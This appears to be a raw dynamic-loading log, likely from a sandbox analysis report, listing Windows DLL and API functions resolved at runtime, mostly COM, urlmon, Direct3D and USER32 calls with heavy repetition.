DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemAlloc

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemFree

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-shlwapi-l2-1-0.dll/IUnknown_Set

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-shlwapi-l2-1-0.dll/SHStrDupW

                    
                
                    
                        
DynamicLoader: ole32.dll/CoTaskMemFree

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-shlwapi-l2-1-0.dll/IUnknown_SetSite

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoInitializeEx

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoUninitialize

                    
                
                    
                        
DynamicLoader: urlmon.dll/CreateURLMonikerEx

                    
                
                    
                        
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive

                    
                
                    
                        
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: Secur32.dll/GetUserNameExW

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-shlwapi-l1-1-0.dll/PathCreateFromUrlW

                    
                
                    
                        
DynamicLoader: SHELL32.dll/SHGetFolderPathW

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertStringSidToSidW

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: SHLWAPI.dll/UrlCanonicalizeA

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: urlmon.dll/CreateAsyncBindCtxEx

                    
                
                    
                        
DynamicLoader: urlmon.dll/RegisterBindStatusCallback

                    
                
                    
                        
DynamicLoader: urlmon.dll/

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-shlwapi-l2-1-0.dll/IUnknown_QueryService

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-shlwapi-l2-1-0.dll/SHGetValueW

                    
                
                    
                        
DynamicLoader: urlmon.dll/CoInternetCreateSecurityManager

                    
                
                    
                        
DynamicLoader: urlmon.dll/

                    
                
                    
                        
DynamicLoader: urlmon.dll/UrlMkGetSessionOption

                    
                
                    
                        
DynamicLoader: urlmon.dll/

                    
                
                    
                        
DynamicLoader: urlmon.dll/CoInternetIsFeatureEnabled

                    
                
                    
                        
DynamicLoader: SHELL32.dll/

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CLSIDFromString

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoGetClassObject

                    
                
                    
                        
DynamicLoader: kernel32.dll/RaiseFailFastException

                    
                
                    
                        
DynamicLoader: USER32.dll/SetCoalescableTimer

                    
                
                    
                        
DynamicLoader: uxtheme.dll/IsAppThemed

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoInitializeEx

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoRegisterInitializeSpy

                    
                
                    
                        
DynamicLoader: urlmon.dll/CoInternetCreateSecurityManager

                    
                
                    
                        
DynamicLoader: urlmon.dll/

                    
                
                    
                        
DynamicLoader: urlmon.dll/

                    
                
                    
                        
DynamicLoader: urlmon.dll/

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemAlloc

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/ProgIDFromCLSID

                    
                
                    
                        
DynamicLoader: urlmon.dll/CoInternetQueryInfo

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CLSIDFromString

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-shlwapi-l2-1-0.dll/IUnknown_QueryService

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemFree

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: mshtml.dll/TravelLogCreateInstance

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoCreateInstance

                    
                
                    
                        
DynamicLoader: urlmon.dll/CreateURLMonikerEx

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: urlmon.dll/CoInternetCreateSecurityManager

                    
                
                    
                        
DynamicLoader: urlmon.dll/

                    
                
                    
                        
DynamicLoader: SHELL32.dll/SHCreateAssociationRegistration

                    
                
                    
                        
DynamicLoader: urlmon.dll/CoInternetGetSession

                    
                
                    
                        
DynamicLoader: urlmon.dll/

                    
                
                    
                        
DynamicLoader: urlmon.dll/CoInternetQueryInfo

                    
                
                    
                        
DynamicLoader: urlmon.dll/

                    
                
                    
                        
DynamicLoader: urlmon.dll/

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-shlwapi-l2-1-0.dll/SHStrDupW

                    
                
                    
                        
DynamicLoader: urlmon.dll/

                    
                
                    
                        
DynamicLoader: kernel32.dll/InitializeSRWLock

                    
                
                    
                        
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive

                    
                
                    
                        
DynamicLoader: kernel32.dll/AcquireSRWLockShared

                    
                
                    
                        
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive

                    
                
                    
                        
DynamicLoader: kernel32.dll/ReleaseSRWLockShared

                    
                
                    
                        
DynamicLoader: urlmon.dll/RegisterBindStatusCallback

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: urlmon.dll/ReleaseBindInfo

                    
                
                    
                        
DynamicLoader: urlmon.dll/

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoWaitForMultipleHandles

                    
                
                    
                        
DynamicLoader: urlmon.dll/RevokeBindStatusCallback

                    
                
                    
                        
DynamicLoader: sechost.dll/LookupAccountNameLocalW

                    
                
                    
                        
DynamicLoader: urlmon.dll/CoInternetCreateZoneManager

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/LookupAccountSidW

                    
                
                    
                        
DynamicLoader: sechost.dll/LookupAccountSidLocalW

                    
                
                    
                        
DynamicLoader: ole32.dll/NdrOleInitializeExtension

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetClassObject

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetMarshalSizeMax

                    
                
                    
                        
DynamicLoader: ole32.dll/CoMarshalInterface

                    
                
                    
                        
DynamicLoader: ole32.dll/CoUnmarshalInterface

                    
                
                    
                        
DynamicLoader: ole32.dll/StringFromIID

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetPSClsid

                    
                
                    
                        
DynamicLoader: ole32.dll/CoTaskMemAlloc

                    
                
                    
                        
DynamicLoader: ole32.dll/CoTaskMemFree

                    
                
                    
                        
DynamicLoader: ole32.dll/CoCreateInstance

                    
                
                    
                        
DynamicLoader: ole32.dll/CoReleaseMarshalData

                    
                
                    
                        
DynamicLoader: ole32.dll/DcomChannelSetHResult

                    
                
                    
                        
DynamicLoader: urlmon.dll/

                    
                
                    
                        
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint

                    
                
                    
                        
DynamicLoader: urlmon.dll/

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetTokenInformation

                    
                
                    
                        
DynamicLoader: Secur32.dll/GetUserNameExA

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetSidSubAuthorityCount

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetSidSubAuthority

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCreateKeyExA

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegQueryValueExA

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegOpenKeyExW

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegGetValueW

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCloseKey

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegSetValueExW

                    
                
                    
                        
DynamicLoader: SHELL32.dll/SHGetKnownFolderPath

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemFree

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/CopySid

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertSidToStringSidW

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW

                    
                
                    
                        
DynamicLoader: comctl32.dll/

                    
                
                    
                        
DynamicLoader: urlmon.dll/ShouldShowIntranetWarningSecband

                    
                
                    
                        
DynamicLoader: ieframe.dll/

                    
                
                    
                        
DynamicLoader: USER32.dll/RegisterTouchHitTestingWindow

                    
                
                    
                        
DynamicLoader: Secur32.dll/GetUserNameExW

                    
                
                    
                        
DynamicLoader: MLANG.dll/

                    
                
                    
                        
DynamicLoader: PROPSYS.dll/PSCreateMemoryPropertyStore

                    
                
                    
                        
DynamicLoader: WININET.dll/GetUrlCacheEntryBinaryBlob

                    
                
                    
                        
DynamicLoader: urlmon.dll/CompatFlagsFromClsid

                    
                
                    
                        
DynamicLoader: kernel32.dll/ResolveDelayLoadedAPI

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: SHLWAPI.dll/

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/IsTextUnicode

                    
                
                    
                        
DynamicLoader: comctl32.dll/

                    
                
                    
                        
DynamicLoader: comctl32.dll/

                    
                
                    
                        
DynamicLoader: comctl32.dll/

                    
                
                    
                        
DynamicLoader: comctl32.dll/

                    
                
                    
                        
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW

                    
                
                    
                        
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW

                    
                
                    
                        
DynamicLoader: comctl32.dll/

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: ole32.dll/RegisterDragDrop

                    
                
                    
                        
DynamicLoader: msls31.dll/

                    
                
                    
                        
DynamicLoader: msls31.dll/

                    
                
                    
                        
DynamicLoader: msls31.dll/

                    
                
                    
                        
DynamicLoader: msls31.dll/

                    
                
                    
                        
DynamicLoader: msls31.dll/

                    
                
                    
                        
DynamicLoader: msls31.dll/

                    
                
                    
                        
DynamicLoader: msls31.dll/

                    
                
                    
                        
DynamicLoader: msls31.dll/

                    
                
                    
                        
DynamicLoader: msls31.dll/

                    
                
                    
                        
DynamicLoader: msls31.dll/

                    
                
                    
                        
DynamicLoader: d2d1.dll/

                    
                
                    
                        
DynamicLoader: DWrite.dll/DWriteCreateFactory

                    
                
                    
                        
DynamicLoader: dxgi.dll/CreateDXGIFactory1

                    
                
                    
                        
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromGdiDisplayName

                    
                
                    
                        
DynamicLoader: GDI32.dll/D3DKMTCloseAdapter

                    
                
                    
                        
DynamicLoader: GDI32.dll/D3DKMTQueryAdapterInfo

                    
                
                    
                        
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromDeviceName

                    
                
                    
                        
DynamicLoader: SETUPAPI.dll/SetupDiGetClassDevsW

                    
                
                    
                        
DynamicLoader: SETUPAPI.dll/SetupDiEnumDeviceInterfaces

                    
                
                    
                        
DynamicLoader: SETUPAPI.dll/SetupDiGetDeviceInterfaceDetailW

                    
                
                    
                        
DynamicLoader: SETUPAPI.dll/SetupDiDestroyDeviceInfoList

                    
                
                    
                        
DynamicLoader: SETUPAPI.dll/SetupDiGetDevicePropertyW

                    
                
                    
                        
DynamicLoader: WINTRUST.dll/WinVerifyTrust

                    
                
                    
                        
DynamicLoader: SETUPAPI.dll/SetupDiGetClassDevsW

                    
                
                    
                        
DynamicLoader: SETUPAPI.dll/SetupDiEnumDeviceInterfaces

                    
                
                    
                        
DynamicLoader: SETUPAPI.dll/SetupDiGetDeviceInterfaceDetailW

                    
                
                    
                        
DynamicLoader: SETUPAPI.dll/SetupDiDestroyDeviceInfoList

                    
                
                    
                        
DynamicLoader: SETUPAPI.dll/SetupDiGetDevicePropertyW

                    
                
                    
                        
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromGdiDisplayName

                    
                
                    
                        
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromDeviceName

                    
                
                    
                        
DynamicLoader: GDI32.dll/D3DKMTCloseAdapter

                    
                
                    
                        
DynamicLoader: GDI32.dll/D3DKMTQueryAdapterInfo

                    
                
                    
                        
DynamicLoader: d3d11.dll/D3D11CreateDevice

                    
                
                    
                        
DynamicLoader: dxgi.dll/CompatValue

                    
                
                    
                        
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromGdiDisplayName

                    
                
                    
                        
DynamicLoader: GDI32.dll/D3DKMTCloseAdapter

                    
                
                    
                        
DynamicLoader: GDI32.dll/D3DKMTQueryAdapterInfo

                    
                
                    
                        
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromDeviceName

                    
                
                    
                        
DynamicLoader: SETUPAPI.dll/SetupDiGetClassDevsW

                    
                
                    
                        
DynamicLoader: SETUPAPI.dll/SetupDiEnumDeviceInterfaces

                    
                
                    
                        
DynamicLoader: SETUPAPI.dll/SetupDiGetDeviceInterfaceDetailW

                    
                
                    
                        
DynamicLoader: SETUPAPI.dll/SetupDiDestroyDeviceInfoList

                    
                
                    
                        
DynamicLoader: SETUPAPI.dll/SetupDiGetDevicePropertyW

                    
                
                    
                        
DynamicLoader: SETUPAPI.dll/SetupDiGetClassDevsW

                    
                
                    
                        
DynamicLoader: SETUPAPI.dll/SetupDiEnumDeviceInterfaces

                    
                
                    
                        
DynamicLoader: SETUPAPI.dll/SetupDiGetDeviceInterfaceDetailW

                    
                
                    
                        
DynamicLoader: SETUPAPI.dll/SetupDiDestroyDeviceInfoList

                    
                
                    
                        
DynamicLoader: SETUPAPI.dll/SetupDiGetDevicePropertyW

                    
                
                    
                        
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromGdiDisplayName

                    
                
                    
                        
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromDeviceName

                    
                
                    
                        
DynamicLoader: GDI32.dll/D3DKMTCloseAdapter

                    
                
                    
                        
DynamicLoader: GDI32.dll/D3DKMTQueryAdapterInfo

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTGetThunkVersion

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTOpenAdapterFromGdiDisplayName

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTOpenAdapterFromDeviceName

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTGetDisplayModeList

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTSetVidPnSourceOwner

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTSetDisplayMode

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTCloseAdapter

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTSetGammaRamp

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTGetDeviceState

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTQueryAdapterInfo

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTWaitForVerticalBlankEvent

                    
                
                    
                        
DynamicLoader: GDI32.dll/D3DKMTCreateDCFromMemory

                    
                
                    
                        
DynamicLoader: GDI32.dll/D3DKMTDestroyDCFromMemory

                    
                
                    
                        
DynamicLoader: GDI32.dll/D3DKMTCheckVidPnExclusiveOwnership

                    
                
                    
                        
DynamicLoader: GDI32.dll/D3DKMTCheckMonitorPowerState

                    
                
                    
                        
DynamicLoader: GDI32.dll/D3DKMTCheckSharedResourceAccess

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTSetQueuedLimit

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTGetMultisampleMethodList

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTQueryAdapterInfo

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTSetDisplayPrivateDriverFormat

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTDestroySynchronizationObject

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTCreateSynchronizationObject

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTDestroyContext

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTCreateContext

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTGetContextSchedulingPriority

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTSetContextSchedulingPriority

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTPresent

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTDestroyDevice

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTCreateDevice

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTQueryAllocationResidency

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTSetAllocationPriority

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTDestroyAllocation

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTOpenResource

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTQueryResourceInfo

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTCreateAllocation

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTGetDeviceState

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTSetDisplayMode

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTSignalSynchronizationObject

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTWaitForSynchronizationObject

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTEscape

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTUnlock

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTLock

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/D3DKMTRender

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/OpenAdapter10_2

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/

                    
                
                    
                        
DynamicLoader: D3D10Warp.dll/

                    
                
                    
                        
DynamicLoader: urlmon.dll/

                    
                
                    
                        
DynamicLoader: urlmon.dll/

                    
                
                    
                        
DynamicLoader: msls31.dll/

                    
                
                    
                        
DynamicLoader: msls31.dll/

                    
                
                    
                        
DynamicLoader: ole32.dll/OleRun

                    
                
                    
                        
DynamicLoader: msls31.dll/

                    
                
                    
                        
DynamicLoader: PROPSYS.dll/VariantToStringWithDefault

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/PropVariantClear

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-shlwapi-l2-1-0.dll/SHCreateMemStream

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-shlwapi-l2-1-0.dll/IStream_Reset

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-shlwapi-l2-1-0.dll/IStream_Size

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-shlwapi-l2-1-0.dll/IStream_Read

                    
                
                    
                        
DynamicLoader: WININET.dll/CommitUrlCacheEntryBinaryBlob

                    
                
                    
                        
DynamicLoader: WININET.dll/GetUrlCacheEntryInfoExW

                    
                
                    
                        
DynamicLoader: urlmon.dll/

                    
                
                    
                        
DynamicLoader: uxtheme.dll/

                    
                
                    
                        
DynamicLoader: uxtheme.dll/GetThemeEnumValue

                    
                
                    
                        
DynamicLoader: uxtheme.dll/GetThemeBitmap

                    
                
                    
                        
DynamicLoader: uxtheme.dll/GetThemeInt

                    
                
                    
                        
DynamicLoader: uxtheme.dll/GetThemeMargins

                    
                
                    
                        
DynamicLoader: uxtheme.dll/GetThemePosition

                    
                
                    
                        
DynamicLoader: msls31.dll/

                    
                
                    
                        
DynamicLoader: DWrite.dll/DWriteCreateFactory

                    
                
                    
                        
DynamicLoader: USER32.dll/IsWindowRedirectedForPrint

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: msls31.dll/

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
                    
                        
DynamicLoader: USER32.dll/GetCurrentInputMessageSource

                    
                
